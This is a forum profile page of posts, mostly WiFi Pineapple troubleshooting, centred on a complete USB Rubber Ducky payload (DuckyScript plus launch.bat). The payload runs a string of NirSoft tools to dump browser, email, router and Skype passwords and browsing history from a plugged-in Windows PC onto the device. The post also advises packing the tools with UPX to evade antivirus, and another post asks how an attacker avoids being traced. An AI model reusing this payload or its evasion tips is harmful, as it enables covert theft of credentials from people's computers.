mrgray
-
Posts
171 -
Joined
-
Last visited
-
Days Won
4
Posts posted by mrgray
-
-
I've been gone for a while and i just came back trying to get caught up with everything.
I installed Sslstrip and it only works with facebook.com? Is that normal?Thanks in advance!
Mr G
-
I haven't run the following, but a couple alterations should make it so that it dynamically finds a drive on the ducky labeled "ducky."
Thanks man i posted it on the main post, haven't tried it yet.
-
(Not my responsibility what you do with these programs)
Update!
------------------------------------------------------------------------------------------------------------------------------------
Thanks to Overwraith, new credit goes to him and the people who helped!
------------------------------------------------------------------------------------------------------------------------------------
Also posted in the github page
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---mrgray%27s-rubber-hacks
--------------------------------------------
Payload mrgray's rubber hacksThe following is a modified version of Mr Gray's password recovery script for the USB rubber ducky. Modifications include googleKnowsBest's ducky drive detection if the drive is labeled "DUCKY", which has been coded to work on all current windows OS's, and a modification to run from a folder on the ducky labeled "MrGraysRubberHacks". This payload has also been tweaked to be a little more forgiving to errors, and as such has some more delays. Forgiving as this script is, it may need customized delays depending on the users requirements. The payload is designed for c_duck_v2_S001.hex, and c_duck_v2_S002.hex firmware types. Wait for the ducky's drive to mount, and then press the button to launch this payload. This payload may also be launched using a binary duck attack in which you use stock duck firmware, linked to a mass storage device via a 2 port USB cable splitter. This method would mount the mass storage almost instantaneously which would negate the need to wait for the ducky's mass storage to mount. The forum page is located here:
The executables are accessible at:
http://www.mediafire.com/?nm1c62qt9w9z3wg
The executables are also individually downloadable from their original location at nirsoft. The executables become resistant to most antivirus detection using the packer UPX. Other such products would further obfuscate the signatures.
ENCODE:DEFAULT_DELAY 25
REM File: MrGraysRubberHacks.txt
REM Target: WINDOWS VISTA/7
DELAY 1000
ESCAPE
CONTROL ESCAPE
DELAY 100
STRING cmd
DELAY 100
ENTER
DELAY 150
STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A :)
ENTER
STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
ENTER
STRING %DUCKYdrive%\launch.bat
ENTER
LAUNCH.BAT file:
for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A :)
REM Output everything to this folder so I don't have everything on the duck's root.
set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txt
start %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txt
start %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txt
start %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txt
start %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txt
start %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txt
start %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txt
start %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txt
start %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txt
start %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txt
start %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txt
start %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txt
start %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txtIf you wish to remove the part of the script that contains the code to the folder MrGraysRubberHacks, and instead have all output go to the root of the drive delete the following items:
ENCODE:
...
STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
ENTER
...LAUNCH.BAT file:
...
REM Output everything to this folder so I dont have everything on the duck's root.
set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
...===========================================================================================
Old setup, out of date somewhat.
===========================================================================================
Must have twine duck!
I made the code but not the programs, you can create your own setup or download the .exe's from there.
Some of the programs will be flagged as hacking tools etc,
if you don't feel safe with my files just download it from NirSoft.
It will create text documents in your D drive which is the ducky drive from the Launch.bat file i made.
---------------------------------------------------------------------------------------------------------------
Source files
---------------------------------------------------------------------------------------------------------------
ENCODE:DELAY 1000ESCAPECONTROL ESCAPEDELAY 100STRING cmdDELAY 100ENTERDELAY 100STRING d:\launch.batENTER---------------------------------------------------------------------------------------------------------------Launch.bat file:start D:\WebBrowserPassView.exe /stext D:\WebBrowserPassView.txtstart D:\SkypeLogView.exe /stext D:\SkypeLogView.txtstart D:\RouterPassView.exe /stext D:\RouterPassView.txtstart D:\pspv.exe /stext D:\pspv.txtstart D:\PasswordFox.exe /stext D:\PasswordFox.txtstart D:\OperaPassView.exe /stext D:\OperaPassView.txtstart D:\mspass.exe /stext D:\mspass.txtstart D:\mailpv.exe /stext D:\mailpv.txtstart D:\iepv.exe /stext D:\iepv.txtstart D:\ChromePass.exe /stext D:\ChromePass.txtstart D:\ChromeHistoryView.exe /stext D:\ChromeHistoryView.txtstart D:\BulletsPassView.exe /stext D:\BulletsPassView.txtstart D:\BrowsingHistoryView.exe /stext D:\BrowsingHistoryView.txtexit---------------------------------------------------------------------------------------------------------------
Its pretty simple and its still in beta so re-code to you liking and i only made the source codes.
Again do NOT say i am spreading viruses, Download it from the website and they will be the same codes.
The list of the programs i used is right above the paragraph.
---------------------------------------------------------------------------------------------------------------
Download my files
http://www.mediafire.com/?nm1c62qt9w9z3wg
---------------------------------------------------------------------------------------------------------------
Hope you like my sources!
-
The memory card are fine that i put in and when i plug it in it asks me to format the SD card
Im on the new twine duck firmware
-
So i'm needing to know how would a "Hacker" get away with DNS spoofing and other things that the Mark IV Pineapple do?
Can they trace it back to you and etc?
I think there should be a (Pined) thread about this on how a "Hacker" would get away and not get caught. The Does and Don'ts you know.
-
For now this is working for me,
I have two networks up the main built in one connects to netgear then i have a usb adapter that aslo connects to netgear
enable karma and main built in one gets knocked off and the usb one never gets knocked off
but still im getting knocked off my main one
but simple fix for now and the internet still works on the pineapple, also you need to share your internet again from the adapter to the pineapple
-
I seem to be having an issue with the Karma blacklist. I've added my mac but karma just keeps on accepting probe requests from my machine. I've also tried manually adding it with hostapd_cli. Just keeps on associating me. Very frustrating of course :P
Any ideas?
Here's my post hope you get yours fixed also
-
No worries, what you want to do is add your mac to the blacklist of karma.
I've already did that still same problem:/
I mean it was working before like 3 days ago but then it just stopped i've factory reset it flashed it and everything
Its very odd...
-
Don't do that.
But i like bumping into stuff^_^ hehe
sorry wont happen again
-
Heres a list
Firmware 2.8.0
As you can see it kicked me off
-
-
Same here it sucks! :(
-
MK4 Karma is keep one knocking me off im connected to netgear on my laptop and i have the pineapple going threw POE to my Ethernet on my laptop and when i enable MK4 Karma it says successful pass threw from netgear and kicks me offplease help thanks in advance ‹
-
Just got the cables in its working really good now,
Item fixed! :D
-
Hey,
Remind you that the pineapple is a router. you can connect it to your router and use another wireless card to Create a wifi relay. :]
Another option is to share internet from your laptop to the pineapple and another wifi card for extend the range.
Thanks man for your reply,
What type of wifi card would i need? Sorry i'm a noob but i've been trying everything and its not working
-
-
As far as i know its fixed
Answer: It was the cable, i attached a ps3 wifi adapter that had a PCI U.FL connector since i'm a ps3 repair guy and it worked
I'm buying two PCI U.FL to RP-SMA cables then attaching a N type cable to the RP-SMA connector and making a antenna,
here's the link if you have the same problem the parts cost $7 with shipping and you get 2, 8" cables
http://www.ebay.com/itm/130763375562?ssPageName=STRK:MEWNX:IT&_trksid=p3984.m1497.l2649
-
What i'm thinking of doing is this,
Map of networking
[Main modem]>[Router]>connected to laptop from WiFi> Pineapple connected to PoE/LaN from Ethernet port of laptop> Pineapple WAN/LAN connected to a access point like a router= to get better signal by using the N type access point.
My Wifi on my pineapple is screwed up here is my post on that http://forums.hak5.org/index.php?/topic/28943-pineapple-wifi-not-getting-signal-please-help/
Would this device work for what i'm wanting to do, or will all those deferent connections screw up from all the deferent access points?
-
I had a bum antenna from one of my mark4s out of the box.
Some have had there wifi chips fried. Not sure how
So my wifi chip is fried?
i just spent $130 on the pineapple this sucks..
-
So i've got it all set up my new pineapple IV and the problem i'm having is that my WiFi signal going threw the pineapple is not strong at all, i've tried with, without antenna's and still nothing the max signal i get is just in my room when i go out its gone... I have a 2.4Ghz 7dPI antenna and it doesn't make a deference.
I got the WiFi pineapple holiday bundle
Please help, i've bought a lot from this website $200+ just disappointed with the signal coming threw, thanks in advance if we get the problem resolved.
Does (sslstrip-Infusion) only work on Facebook.com?
in WiFi Pineapple Mark IV
Posted
That's scary! :o
Well hackers could always just do java drive byes from injecting it threw the internet, more info coming threw but always a chance it will flag an AV.
Hopefully Moxie will make another better one or someone else can step in,